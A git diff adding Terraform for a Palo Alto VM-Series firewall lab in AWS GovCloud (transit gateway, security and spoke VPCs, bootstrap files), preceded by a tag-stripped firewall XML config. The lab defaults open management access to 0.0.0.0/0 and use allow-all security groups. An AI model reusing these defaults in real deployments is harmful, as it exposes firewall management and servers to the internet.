+ + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + sha1 + + + group2 + + + aes-128-cbc + + + 28800 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + sha1 + + + aes-128-cbc + + + + 3600 + + group2 + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + -AQ==03WuQF4bZmvokbM9qLJwY6M9dbc=BUUtm3Pm3SpSd3q9y07uXzlJ2he3viHPQ1KZpb1V2rHqScOoKmGf2EldcIaQ2z12 + + + + + + yes + 10 + 3 + + aws + main + + + + yes + + + + + + no + + + no + + + + ethernet1/1 + + + 34.252.94.101 + + + + + + -AQ==Wd8wW4JkNwoNs0I49P3xNMnt3iA=e3T0TArSWXtHvUlQQQ5OMK+4xD6oFBpdV+jvdgPsU6F4fdzNNo71uC7f1HnxknN4 + + + + + + yes + 10 + 3 + + aws + main + + + + yes + + + + + + no + + + no + + + + ethernet1/1 + + + 52.211.42.95 + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + no + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + no + any + 2 + + + 192.168.2.1 + + + None + + ethernet1/1 + 10 + 0.0.0.0/0 + + + + + + + no + any + 2 + + + 192.168.102.1 + + + None + + ethernet1/2 + 10 + 10.0.0.0/8 + + + + + + + + + + + + + + + + + + yes + yes + no + no + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + FW-2 + + + + yes + + + FQDN + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5 + + + yes + yes + yes + yes + + + FW-2 + mgmt-interface-swap + + + + + + + + + + + + + ethernet1/1 + + + + + + + ethernet1/2 + + + + + + + + + 1001 + + + + + + + + + + 2001 + + + + + + + + + + 2002 + + + + + + + + + + 1002 + + + + + + + + + + + + + + + trust + + + untrust + + + any + + + any + + + any + + + any + + + any + + + tcp-1001 + tcp-1002 + tcp-2001 + tcp-2002 + + + any + + allow + + + + trust + + + trust + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + yes + intrazone + + + + untrust + + + trust + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + yes + + + + + + + + + + ethernet1/1 + + + + + untrust + + + trust + + + any + + + any + + any + + + + untrust + + + untrust + + + any + + + 192.168.2.45 + + tcp-1001 + + + + ethernet1/2 + + + + + 22 + 10.1.1.45 + + + + + untrust + + + untrust + + + any + + + 192.168.2.45 + + tcp-1002 + + + + ethernet1/2 + + + + + 22 + 10.1.2.45 + + + + + untrust + + + untrust + + + any + + + 192.168.2.45 + + tcp-2001 + + + + ethernet1/2 + + + + + 22 + 10.2.1.45 + + + + + untrust + + + untrust + + + any + + + 192.168.2.45 + + tcp-2002 + + + + ethernet1/2 + + + + + 22 + 10.2.2.45 + + + + + + + ethernet1/2 + + + + + trust + + + trust + + + 10.0.0.0/8 + + + 10.0.0.0/8 + + any + + + + + + + allow + no + yes + + + deny + no + yes + + + + + + + + ethernet1/1 + ethernet1/2 + + + + + + + + diff --git a/aws/TGW-VPC-GovCloud/bootstrap_files2/init-cfg.txt b/aws/TGW-VPC-GovCloud/bootstrap_files2/init-cfg.txt new file mode 100644 index 00000000..6dc97916 --- /dev/null +++ b/aws/TGW-VPC-GovCloud/bootstrap_files2/init-cfg.txt @@ -0,0 +1,18 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +hostname=FW-2 +panorama-server= +panorama-server-2= +tplname= +dgname= +dns-primary= +dns-secondary= +op-command-modes=mgmt-interface-swap +dhcp-send-hostname=yes +dhcp-send-client-id=yes +dhcp-accept-server-hostname=yes +dhcp-accept-server-domain=yes diff --git a/aws/TGW-VPC-GovCloud/providers.tf b/aws/TGW-VPC-GovCloud/providers.tf new file mode 100644 index 00000000..af7b0ba3 --- /dev/null +++ b/aws/TGW-VPC-GovCloud/providers.tf @@ -0,0 +1,3 @@ +provider "aws" { + region = "${var.aws_region}" +} diff --git a/aws/TGW-VPC-GovCloud/tgw.tf b/aws/TGW-VPC-GovCloud/tgw.tf new file mode 100644 index 00000000..191dce08 --- /dev/null +++ b/aws/TGW-VPC-GovCloud/tgw.tf @@ -0,0 +1,51 @@ +resource "aws_ec2_transit_gateway" "tgw" { + description = "Transit Gateway" + vpn_ecmp_support = "enable" + default_route_table_association = "disable" + default_route_table_propagation = "disable" + dns_support = "enable" + auto_accept_shared_attachments = "disable" + + tags { + Name = "transit_gateway" + } +} + +resource "aws_ec2_transit_gateway_route_table" "tgw_security" { + transit_gateway_id = "${aws_ec2_transit_gateway.tgw.id}" + + tags { + Name = "tgw-rtb-security" + } +} + +resource "aws_ec2_transit_gateway_route_table" "tgw_spokes" { + transit_gateway_id = "${aws_ec2_transit_gateway.tgw.id}" + + tags { + Name = "tgw-rtb-spokes" + } +} + +resource "aws_ec2_transit_gateway_route" "default" { + destination_cidr_block = "0.0.0.0/0" + transit_gateway_attachment_id = "${aws_ec2_transit_gateway_vpc_attachment.tgw_security.id}" + transit_gateway_route_table_id = "${aws_ec2_transit_gateway_route_table.tgw_spokes.id}" +} + +resource "aws_ec2_transit_gateway_route_table_association" "vpc_security" { + transit_gateway_attachment_id = "${aws_ec2_transit_gateway_vpc_attachment.tgw_security.id}" + transit_gateway_route_table_id = "${aws_ec2_transit_gateway_route_table.tgw_security.id}" +} + +resource "aws_ec2_transit_gateway_vpc_attachment" "tgw_security" { + vpc_id = "${aws_vpc.vpc_security.id}" + subnet_ids = ["${aws_subnet.vpc_security_tgw_1.id}", "${aws_subnet.vpc_security_tgw_2.id}"] + transit_gateway_id = "${aws_ec2_transit_gateway.tgw.id}" + transit_gateway_default_route_table_association = false + transit_gateway_default_route_table_propagation = false + + tags { + Name = "tgw_attachment_security" + } +} diff --git a/aws/TGW-VPC-GovCloud/variables.tf b/aws/TGW-VPC-GovCloud/variables.tf new file mode 100644 index 00000000..75faedb0 --- /dev/null +++ b/aws/TGW-VPC-GovCloud/variables.tf @@ -0,0 +1,134 @@ +//This section should be verified and modified accordingly. +variable aws_region { + description = "AWS Region for deployment" + default = "us-gov-west-1" +} + +variable aws_key { + description = "aws_key" + default = "AWS-Lab-Pair" +} + +//Do not create these. The Terraform will do that. Just need to make secure +//the s3 bucket names are unique. + +variable bootstrap_s3bucket { + description = "S3 Bucket Name used to Bootstrap the NGFWs" + default = "ptg-tgw-bucket1" +} + +variable bootstrap_s3bucket2 { + description = "S3 Bucket Name used to Bootstrap the NGFWs" + default = "ptg-tgw-bucket2" +} + +//End of the section that MUST be modified to work +variable management_cidr { + description = "CIDR Address for Management Access" + default = "0.0.0.0/0" +} + +variable vpc_security_cidr { + description = "CIDR Address for Security VPC" + default = "192.168.0.0/16" +} + +variable vpc_security_subnet_public_1 { + description = "CIDR Address for Security VPC" + default = "192.168.1.0/24" +} + +variable vpc_security_subnet_private_1 { + description = "CIDR Address for Security VPC" + default = "192.168.101.0/24" +} + +variable fw_ip_subnet_private_1 { + description = "CIDR Address for Security VPC" + default = "192.168.101.45" +} + +variable fw_ip_subnet_public_1 { + description = "CIDR Address for Security VPC" + default = "192.168.1.45" +} + +variable vpc_security_subnet_tgw_1 { + description = "CIDR Address for TGW Security VPC" + default = "192.168.11.0/24" +} + +variable vpc_security_subnet_public_2 { + description = "CIDR Address for Security VPC" + default = "192.168.2.0/24" +} + +variable vpc_security_subnet_private_2 { + description = "CIDR Address for Security VPC" + default = "192.168.102.0/24" +} + +variable vpc_security_subnet_tgw_2 { + description = "CIDR Address for TGW Security VPC" + default = "192.168.21.0/24" +} + +variable fw_ip_subnet_private_2 { + description = "CIDR Address for Security VPC" + default = "192.168.102.45" +} + +variable fw_ip_subnet_public_2 { + description = "CIDR Address for Security VPC" + default = "192.168.2.45" +} + +variable spoke1_cidr { + description = "CIDR Address for Spoke1 VPC" + default = "10.1.0.0/16" +} + +variable spoke1_subnet { + description = "CIDR Address for Spoke1 Subnet" + default = "10.1.1.0/24" +} + +variable spoke1_subnet2 { + description = "CIDR Address for Spoke1 Subnet" + default = "10.1.2.0/24" +} + +variable spoke1_server { + description = "Server Address for Spoke1 Server" + default = "10.1.1.45" +} + +variable spoke1_server2 { + description = "Server Address for Spoke1 Server2" + default = "10.1.2.45" +} + +variable spoke2_cidr { + description = "CIDR Address for Spoke2 VPC" + default = "10.2.0.0/16" +} + +variable spoke2_subnet { + description = "CIDR Address for Spoke2 Subnet" + default = "10.2.1.0/24" +} + +variable spoke2_subnet2 { + description = "CIDR Address for Spoke2 Subnet" + default = "10.2.2.0/24" +} + +variable spoke2_server { + description = "Server Address for Spoke2 Server" + default = "10.2.1.45" +} + +variable spoke2_server2 { + description = "Server Address for Spoke2 Server2" + default = "10.2.2.45" +} diff --git a/aws/TGW-VPC-GovCloud/vm-series/main.tf b/aws/TGW-VPC-GovCloud/vm-series/main.tf new file mode 100644 index 00000000..e519e14c --- /dev/null +++ b/aws/TGW-VPC-GovCloud/vm-series/main.tf @@ -0,0 +1,165 @@ +variable name { + description = "firewall instance name" +} + +variable untrust_subnet_id {} +variable untrust_security_group_id {} +variable untrustfwip {} + +variable trust_subnet_id {} +variable trust_security_group_id {} +variable trustfwip {} + +variable management_subnet_id {} +variable management_security_group_id {} + +variable bootstrap_profile { + default = "" +} + +variable bootstrap_s3bucket {} + +variable tgw_id {} + +variable aws_region {} +variable aws_key {} + +variable instance_type { + default = "m4.2xlarge" +} + +variable ngfw_license_type { + default = "payg2" +} + +variable ngfw_version { + default = "8.1" +} + +variable "license_type_map" { + type = "map" + + default = { + "byol" = "6njl1pau431dv1qxipg63mvah" + "payg1" = "6kxdw3bbmdeda3o6i1ggqt4km" + "payg2" = "806j2of0qy5osgjjixq9gqc6g" + } +} + +data "aws_ami" "panw_ngfw" { + most_recent = true + owners = ["aws-marketplace"] + filter { + name = "owner-alias" + values = ["aws-marketplace"] + } + + filter { + name = "product-code" + values = ["${var.license_type_map[var.ngfw_license_type]}"] + } + + filter { + name = "name" + values = ["PA-VM-AWS-${var.ngfw_version}*"] + } +} + +data "aws_region" "current" { + name = "${var.aws_region}" +} + +resource "aws_network_interface" "eni-management" { + subnet_id = "${var.management_subnet_id}" + security_groups = ["${var.management_security_group_id}"] + source_dest_check = true + + tags { + Name = "eni_${var.name}_management" + } +} + +resource "aws_network_interface" "eni-trust" { + subnet_id = "${var.trust_subnet_id}" + private_ips = ["${var.trustfwip}"] + security_groups = ["${var.trust_security_group_id}"] + source_dest_check = false + + tags { + Name = "eni_${var.name}_trust" + } +} + +output "eni-trust" { + value = "${aws_network_interface.eni-trust.id}" +} + +resource "aws_eip" "eip-management" { + vpc = true + network_interface = "${aws_network_interface.eni-management.id}" + + tags { + Name = "eip_${var.name}_management" + } +} + +resource "aws_network_interface" "eni-untrust" { + subnet_id = "${var.untrust_subnet_id}" + private_ips = ["${var.untrustfwip}"] + security_groups = ["${var.untrust_security_group_id}"] + source_dest_check = false + + tags { + Name = "eni_${var.name}_untrust" + } +} + +resource "aws_eip" "eip-untrust" { + vpc = true + network_interface = "${aws_network_interface.eni-untrust.id}" + + tags { + Name = "eip_${var.name}_untrust" + } +} + +resource "aws_instance" "instance-ngfw" { + disable_api_termination = false + instance_initiated_shutdown_behavior = "stop" + iam_instance_profile = "${var.bootstrap_profile}" + user_data = "${base64encode(join("", list("vmseries-bootstrap-aws-s3bucket=", var.bootstrap_s3bucket)))}" + + ebs_optimized = true + ami = "${data.aws_ami.panw_ngfw.image_id}" + instance_type = "${var.instance_type}" + key_name = "${var.aws_key}" + + monitoring = false + + network_interface { + device_index = 1 + network_interface_id = "${aws_network_interface.eni-management.id}" + } + + network_interface { + device_index = 0 + network_interface_id = "${aws_network_interface.eni-untrust.id}" + } + + network_interface { + device_index = 2 + network_interface_id = "${aws_network_interface.eni-trust.id}" + } + + tags { + Name = "${var.name}" + } +} + +output "eip_untrust" { + value = "${aws_eip.eip-untrust.public_ip}" +} + +output "eip_mgmt" { + value = "${aws_eip.eip-management.public_ip}" +} diff --git a/aws/TGW-VPC-GovCloud/vpc_security.tf b/aws/TGW-VPC-GovCloud/vpc_security.tf new file mode 100644 index 00000000..2d0fe6e8 --- /dev/null +++ b/aws/TGW-VPC-GovCloud/vpc_security.tf @@ -0,0 +1,325 @@ +data "aws_availability_zones" "available" {} + +resource "aws_vpc" "vpc_security" { + cidr_block = "${var.vpc_security_cidr}" + + tags { + Name = "vpc_security" + } +} + +resource "aws_subnet" "vpc_security_public_1" { + vpc_id = "${aws_vpc.vpc_security.id}" + cidr_block = "${var.vpc_security_subnet_public_1}" + availability_zone = "${data.aws_availability_zones.available.names[0]}" + + tags { + Name = "vpc_security_public_1" + } +} + +resource "aws_subnet" "vpc_security_public_2" { + vpc_id = "${aws_vpc.vpc_security.id}" + cidr_block = "${var.vpc_security_subnet_public_2}" + availability_zone = "${data.aws_availability_zones.available.names[1]}" + + tags { + Name = "vpc_security_public_2" + } +} + +resource "aws_subnet" "vpc_security_private_1" { + vpc_id = "${aws_vpc.vpc_security.id}" + cidr_block = "${var.vpc_security_subnet_private_1}" + availability_zone = "${data.aws_availability_zones.available.names[0]}" + + tags { + Name = "vpc_security_private_1" + } +} + +resource "aws_subnet" "vpc_security_private_2" { + vpc_id = "${aws_vpc.vpc_security.id}" + cidr_block = "${var.vpc_security_subnet_private_2}" + availability_zone = "${data.aws_availability_zones.available.names[1]}" + + tags { + Name = "vpc_security_private_2" + } +} + +resource "aws_subnet" "vpc_security_tgw_1" { + vpc_id = "${aws_vpc.vpc_security.id}" + cidr_block = "${var.vpc_security_subnet_tgw_1}" + availability_zone = "${data.aws_availability_zones.available.names[0]}" + + tags { + Name = "vpc_security_tgw_1" + } +} + +resource "aws_subnet" "vpc_security_tgw_2" { + vpc_id = "${aws_vpc.vpc_security.id}" + cidr_block = "${var.vpc_security_subnet_tgw_2}" + availability_zone = "${data.aws_availability_zones.available.names[1]}" + + tags { + Name = "vpc_security_tgw_2" + } +} + +resource "aws_route_table" "vpc_security_tgw_1" { + vpc_id = "${aws_vpc.vpc_security.id}" + + tags { + Name = "tgw_1" + } +} + +resource "aws_route_table" "vpc_security_tgw_2" { + vpc_id = "${aws_vpc.vpc_security.id}" + + tags { + Name = "tgw_2" + } +} + +resource "aws_route_table" "vpc_security_private_1" { + vpc_id = "${aws_vpc.vpc_security.id}" + + tags { + Name = "private_1" + } +} + +resource "aws_route_table" "vpc_security_private_2" { + vpc_id = "${aws_vpc.vpc_security.id}" + + tags { + Name = "private_2" + } +} + +resource "aws_route_table_association" "vpc_security_private_1" { + subnet_id = "${aws_subnet.vpc_security_private_1.id}" + route_table_id = "${aws_route_table.vpc_security_private_1.id}" +} + +resource "aws_route_table_association" "vpc_security_private_2" { + subnet_id = "${aws_subnet.vpc_security_private_2.id}" + route_table_id = "${aws_route_table.vpc_security_private_2.id}" +} + +resource "aws_route_table_association" "vpc_security_tgw_1" { + subnet_id = "${aws_subnet.vpc_security_tgw_1.id}" + route_table_id = "${aws_route_table.vpc_security_tgw_1.id}" +} + +resource "aws_route_table_association" "vpc_security_tgw_2" { + subnet_id = "${aws_subnet.vpc_security_tgw_2.id}" + route_table_id = "${aws_route_table.vpc_security_tgw_2.id}" +} + +resource "aws_route" "vpc_security_tgw_1_0" { + route_table_id = "${aws_route_table.vpc_security_tgw_1.id}" + destination_cidr_block = "0.0.0.0/0" + network_interface_id = "${module.ngfw1.eni-trust}" +} + +resource "aws_route" "vpc_security_tgw_1_1" { + route_table_id = "${aws_route_table.vpc_security_tgw_1.id}" + destination_cidr_block = "10.0.0.0/8" + network_interface_id = "${module.ngfw1.eni-trust}" +} + +resource "aws_route" "vpc_security_tgw_2_0" { + route_table_id = "${aws_route_table.vpc_security_tgw_2.id}" + destination_cidr_block = "0.0.0.0/0" + network_interface_id = "${module.ngfw2.eni-trust}" +} + +resource "aws_route" "vpc_security_tgw_2_1" { + route_table_id = "${aws_route_table.vpc_security_tgw_2.id}" + destination_cidr_block = "10.0.0.0/8" + network_interface_id = "${module.ngfw2.eni-trust}" +} + +resource "aws_route" "vpc_security_trust_1_0" { + route_table_id = "${aws_route_table.vpc_security_private_1.id}" + destination_cidr_block = "10.0.0.0/8" + transit_gateway_id = "${aws_ec2_transit_gateway.tgw.id}" +} + +resource "aws_route" "vpc_security_trust_2_0" { + route_table_id = "${aws_route_table.vpc_security_private_2.id}" + destination_cidr_block = "10.0.0.0/8" + transit_gateway_id = "${aws_ec2_transit_gateway.tgw.id}" +} + +resource "aws_internet_gateway" "vpc_security_igw" { + vpc_id = "${aws_vpc.vpc_security.id}" + + tags { + Name = "vpc_securty_igw" + } +} + +resource "aws_route" "vpc_security_default" { + route_table_id = "${aws_vpc.vpc_security.default_route_table_id}" + destination_cidr_block = "0.0.0.0/0" + gateway_id = "${aws_internet_gateway.vpc_security_igw.id}" +} + +resource "aws_security_group" "allow_all" { + name = "allow_all" + description = "Allow all inbound traffic" + vpc_id = "${aws_vpc.vpc_security.id}" +} + +resource "aws_security_group_rule" "allow_all_ingress" { + type = "ingress" + from_port = 0 + to_port = 0 + protocol = "-1" + cidr_blocks = ["0.0.0.0/0"] + + security_group_id = "${aws_security_group.allow_all.id}" +} + +resource "aws_security_group_rule" "allow_all_egress" { + type = "egress" + from_port = 0 + to_port = 0 + protocol = "-1" + cidr_blocks = ["0.0.0.0/0"] + + security_group_id = "${aws_security_group.allow_all.id}" +} + +resource "aws_security_group" "allow_https_ssh" { + name = "allow_https_ssh" + description = "Allow HTTPS and SSH inbound traffic" + vpc_id = "${aws_vpc.vpc_security.id}" +} + +resource "aws_security_group_rule" "allow_ssh_ingress" { + type = "ingress" + from_port = 22 + to_port = 22 + protocol = "tcp" + cidr_blocks = ["${var.management_cidr}"] + + security_group_id = "${aws_security_group.allow_https_ssh.id}" +} + +resource "aws_security_group_rule" "allow_https_ingress" { + type = "ingress" + from_port = 443 + to_port = 443 + protocol = "tcp" + cidr_blocks = ["${var.management_cidr}"] + + security_group_id = "${aws_security_group.allow_https_ssh.id}" +} + +resource "aws_security_group_rule" "allow_all" { + type = "egress" + from_port = 0 + to_port = 0 + protocol = "-1" + cidr_blocks = ["0.0.0.0/0"] + + security_group_id = "${aws_security_group.allow_https_ssh.id}" +} + +module "ngfw1" { + source = "./vm-series/" + + name = "ngfw1" + + aws_key = "${var.aws_key}" + + trust_subnet_id = "${aws_subnet.vpc_security_private_1.id}" + trust_security_group_id = "${aws_security_group.allow_all.id}" + trustfwip = "${var.fw_ip_subnet_private_1}" + + untrust_subnet_id = "${aws_subnet.vpc_security_public_1.id}" + untrust_security_group_id = "${aws_security_group.allow_all.id}" + untrustfwip = "${var.fw_ip_subnet_public_1 }" + + management_subnet_id = "${aws_subnet.vpc_security_public_1.id}" + management_security_group_id = "${aws_security_group.allow_https_ssh.id}" + + bootstrap_profile = "${aws_iam_instance_profile.bootstrap_profile.id}" + bootstrap_s3bucket = "${var.bootstrap_s3bucket}" + + tgw_id = "${aws_ec2_transit_gateway.tgw.id}" + + aws_region = "${var.aws_region}" +} + +module "ngfw2" { + source = "./vm-series/" + + name = "ngfw2" + + aws_key = "${var.aws_key}" + + trust_subnet_id = "${aws_subnet.vpc_security_private_2.id}" + trust_security_group_id = "${aws_security_group.allow_all.id}" + trustfwip = "${var.fw_ip_subnet_private_2}" + + untrust_subnet_id = "${aws_subnet.vpc_security_public_2.id}" + untrust_security_group_id = "${aws_security_group.allow_all.id}" + untrustfwip = "${var.fw_ip_subnet_public_2 }" + + management_subnet_id = "${aws_subnet.vpc_security_public_2.id}" + management_security_group_id = "${aws_security_group.allow_https_ssh.id}" + + bootstrap_profile = "${aws_iam_instance_profile.bootstrap_profile2.id}" + bootstrap_s3bucket = "${var.bootstrap_s3bucket2}" + + tgw_id = "${aws_ec2_transit_gateway.tgw.id}" + + aws_region = "${var.aws_region}" +} + +output "FW-1-MGMT" { + value = "Access the firewall MGMT via: https://${module.ngfw1.eip_mgmt}" +} + +output "Server-1-1_ngfw1_access" { + value = "Access Server 1-1 via FW-1: ssh -i ubuntu@${module.ngfw1.eip_untrust} -p 1001" +} + +output "Server-1-2_ngfw1_access" { + value = "Access Server 1-2 via FW-1: ssh -i ubuntu@${module.ngfw1.eip_untrust} -p 1002" +} + +output "Server-2-1_ngfw1_access" { + value = "Access Server 2-1 via FW-1: ssh -i ubuntu@${module.ngfw1.eip_untrust} -p 2001" +} + +output "Server-2-2_ngfw1_access" { + value = "Access Server 2-2 via FW-1: ssh -i ubuntu@${module.ngfw1.eip_untrust} -p 2002" +} + +output "FW-2-MGMT" { + value = "Access the firewall MGMT via: https://${module.ngfw2.eip_mgmt}" +} + +output "Server-1-1_ngfw2_access" { + value = "Access Server 1-1 via FW-2: ssh -i ubuntu@${module.ngfw2.eip_untrust} -p 1001" +} + +output "Server-1-2_ngfw2_access" { + value = "Access Server 1-2 via FW-2: ssh -i ubuntu@${module.ngfw2.eip_untrust} -p 1002" +} + +output "Server-2-1_ngfw2_access" { + value = "Access Server 2-1 via FW-2: ssh -i ubuntu@${module.ngfw2.eip_untrust} -p 2001" +} + +output "Server-2-2_ngfw2_access" { + value = "Access Server 2-2 via FW-2: ssh -i ubuntu@${module.ngfw2.eip_untrust} -p 2002" +} diff --git a/aws/TGW-VPC-GovCloud/vpc_spoke/main.tf b/aws/TGW-VPC-GovCloud/vpc_spoke/main.tf new file mode 100644 index 00000000..0e6da0e8 --- /dev/null +++ b/aws/TGW-VPC-GovCloud/vpc_spoke/main.tf @@ -0,0 +1,191 @@ +variable vpc_spoke_cidr { + description = "CIDR Network Address for Spoke VPC" +} + +variable vpc_spoke_subnet_cidr { + description = "CIDR Network Address for Spoke Subnet" +} + +variable vpc_spoke_subnet2_cidr { + description = "CIDR Network Address for Spoke Subnet" +} + +variable aws_tgw_id { + description = "AWS Transit Gateway ID" +} + +variable aws_tgw_security_rtb_id { + description = "AWS Transit Gateway Route Table Id" +} + +variable aws_tgw_spoke_rtb_id { + description = "AWS Transit Gateway Route Table Id" +} + +variable pemkey { + description = "AWS pem KEY" +} + +variable serverip { + description = "Ubuntu Server IP" +} + +variable server2ip { + description = "Ubuntu Server2 IP" +} + +variable servername { + description = "Ubuntu Server name" +} + +variable server2name { + description = "Ubuntu Server2 name" +} + +resource "aws_vpc" "vpc_spoke" { + cidr_block = "${var.vpc_spoke_cidr}" + + tags { + Name = "vpc_spoke_${var.vpc_spoke_cidr}" + } +} + +data "aws_availability_zones" "available" {} + +resource "aws_subnet" "primary" { + vpc_id = "${aws_vpc.vpc_spoke.id}" + cidr_block = "${var.vpc_spoke_subnet_cidr}" + availability_zone = "${data.aws_availability_zones.available.names[0]}" + + tags { + Name = "vpc_spokeA_${var.vpc_spoke_subnet_cidr}" + } +} + +resource "aws_subnet" "secondary" { + vpc_id = "${aws_vpc.vpc_spoke.id}" + cidr_block = "${var.vpc_spoke_subnet2_cidr}" + availability_zone = "${data.aws_availability_zones.available.names[1]}" + + tags { + Name = "vpc_spokeB_${var.vpc_spoke_subnet2_cidr}" + } +} + +resource "aws_security_group" "server_sg" { + name = "server_sg" + description = "Allow select inbound traffic" + vpc_id = "${aws_vpc.vpc_spoke.id}" +} + +resource "aws_security_group_rule" "allow_server_sg_ingress" { + type = "ingress" + from_port = 0 + to_port = 0 + protocol = "-1" + cidr_blocks = ["10.0.0.0/8", "192.168.0.0/16"] + + security_group_id = "${aws_security_group.server_sg.id}" +} + +resource "aws_security_group_rule" "allow_server_sg_egress" { + type = "egress" + from_port = 0 + to_port = 0 + protocol = "-1" + cidr_blocks = ["0.0.0.0/0"] + + security_group_id = "${aws_security_group.server_sg.id}" +} + +resource "aws_route" "vpc_spoke_route_1" { + route_table_id = "${aws_vpc.vpc_spoke.default_route_table_id}" + destination_cidr_block = "10.0.0.0/8" + transit_gateway_id = "${var.aws_tgw_id}" +} + +resource "aws_route" "vpc_spoke_route_2" { + route_table_id = "${aws_vpc.vpc_spoke.default_route_table_id}" + destination_cidr_block = "192.168.0.0/16" + transit_gateway_id = "${var.aws_tgw_id}" +} + +resource "aws_route" "vpc_spoke_route_3" { + route_table_id = "${aws_vpc.vpc_spoke.default_route_table_id}" + destination_cidr_block = "0.0.0.0/0" + transit_gateway_id = "${var.aws_tgw_id}" +} + +resource "aws_ec2_transit_gateway_vpc_attachment" "tgw_spoke_attachment" { + vpc_id = "${aws_vpc.vpc_spoke.id}" + subnet_ids = ["${aws_subnet.primary.id}", "${aws_subnet.secondary.id}"] + transit_gateway_id = "${var.aws_tgw_id}" + transit_gateway_default_route_table_association = false + transit_gateway_default_route_table_propagation = false + + tags { + Name = "tgw_attachment_spoke_${var.vpc_spoke_cidr}" + } +} + +resource "aws_ec2_transit_gateway_route_table_association" "vpc_spoke_1" { + transit_gateway_attachment_id = "${aws_ec2_transit_gateway_vpc_attachment.tgw_spoke_attachment.id}" + transit_gateway_route_table_id = "${var.aws_tgw_spoke_rtb_id}" +} + +resource "aws_ec2_transit_gateway_route_table_propagation" "route_table_propagation" { + transit_gateway_attachment_id = "${aws_ec2_transit_gateway_vpc_attachment.tgw_spoke_attachment.id}" + transit_gateway_route_table_id = "${var.aws_tgw_security_rtb_id}" +} + +//Server in subnet +data "aws_ami" "ubuntu" { + most_recent = true + + filter { + name = "name" + values = ["ubuntu/images/hvm-ssd/ubuntu-trusty-14.04-*"] + } + + filter { + name = "virtualization-type" + values = ["hvm"] + } + + owners = ["513442679011"] # Canonical +} + +resource "aws_instance" "web" { + ami = "${data.aws_ami.ubuntu.id}" + instance_type = "t2.micro" + key_name = "${var.pemkey}" + subnet_id = "${aws_subnet.primary.id}" + private_ip = "${var.serverip}" + security_groups = ["${aws_security_group.server_sg.id}"] + + tags = { + Name = "${var.servername}" + } +} + +resource "aws_instance" "web2" { + ami = "${data.aws_ami.ubuntu.id}" + instance_type = "t2.micro" + key_name = "${var.pemkey}" + subnet_id = "${aws_subnet.secondary.id}" + private_ip = "${var.server2ip}" + security_groups = ["${aws_security_group.server_sg.id}"] + + tags = { + Name = "${var.server2name}" + } +} + +//End Server +output "vpc_id" { + value = "${aws_vpc.vpc_spoke.id}" +} + +output "subnet_id" { + value = "${aws_subnet.primary.id}" +} diff --git a/aws/TGW-VPC-GovCloud/vpc_spokes.tf b/aws/TGW-VPC-GovCloud/vpc_spokes.tf new file mode 100644 index 00000000..d0e66637 --- /dev/null +++ b/aws/TGW-VPC-GovCloud/vpc_spokes.tf @@ -0,0 +1,31 @@ +module "spoke1" { + source = "./vpc_spoke/" + + pemkey = "${var.aws_key}" + serverip = "${var.spoke1_server}" + server2ip = "${var.spoke1_server2}" + servername = "spoke1-server1" + server2name = "spoke1-server2" + vpc_spoke_cidr = "${var.spoke1_cidr}" + vpc_spoke_subnet_cidr = "${var.spoke1_subnet}" + vpc_spoke_subnet2_cidr = "${var.spoke1_subnet2}" + aws_tgw_id = "${aws_ec2_transit_gateway.tgw.id}" + aws_tgw_spoke_rtb_id = "${aws_ec2_transit_gateway_route_table.tgw_spokes.id}" + aws_tgw_security_rtb_id = "${aws_ec2_transit_gateway_route_table.tgw_security.id}" +} + +module "spoke2" { + source = "./vpc_spoke/" + + pemkey = "${var.aws_key}" + serverip = "${var.spoke2_server}" + server2ip = "${var.spoke2_server2}" + servername = "spoke2-server" + server2name = "spoke2-server2" + vpc_spoke_cidr = "${var.spoke2_cidr}" + vpc_spoke_subnet_cidr = "${var.spoke2_subnet}" + vpc_spoke_subnet2_cidr = "${var.spoke2_subnet2}" + aws_tgw_id = "${aws_ec2_transit_gateway.tgw.id}" + aws_tgw_spoke_rtb_id = "${aws_ec2_transit_gateway_route_table.tgw_spokes.id}" + aws_tgw_security_rtb_id = "${aws_ec2_transit_gateway_route_table.tgw_security.id}" +} diff --git a/aws/TGW-VPC-Mirroring/README.md b/aws/TGW-VPC-Mirroring/README.md new file mode 100644 index 00000000..de470543 --- /dev/null +++ b/aws/TGW-VPC-Mirroring/README.md @@ -0,0 +1,72 @@ +## 4 x VM-Series / 2 x Spoke VPCs via Transit Gateway +Terraform creates 2 VM-Series firewalls sets. 1 for inbound and outbound traffic from the spoke VPCs. The other set is setup behind an internal Load Balancer and ready for VPC Traffic Mirroring configuration. Currently, the AWS Terraform Provider does not support VPC Traffic Mirror. As a result, after deployment there are some steps that need to be done to setup VPC traffic Mirroring. Those are documenented in screen shots below. + +### Overview +* 3 x VPCs with relevant TGW connections and routing +* 4 x VM-Series (Bundle1) +* 2 x Ubuntu VM in 